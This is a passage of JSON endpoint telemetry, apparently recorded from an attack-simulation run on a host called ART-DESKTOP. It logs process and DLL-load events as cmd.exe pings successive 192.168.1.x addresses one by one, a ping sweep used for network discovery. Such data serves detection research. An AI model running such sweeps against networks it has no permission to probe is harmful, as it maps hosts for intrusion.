"{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572541990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "event_type": "process", - "pid": 7872, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572546840000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-00104EA85201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.116", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3980, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572547029984, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572546980000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "event_type": "process", - "pid": 3980, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572551990000, - "unique_pid": "{42FC7E13-CB86-5C05-0000-0010C3AA5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.117", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7172, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "process", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572556830000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.118", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "process", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572561990000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.119", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4884, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "process", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572566830000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.120", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7800, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572566980000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "process", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572571990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.121", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3288, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572300000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "process", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572576990000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.122", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 820, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": 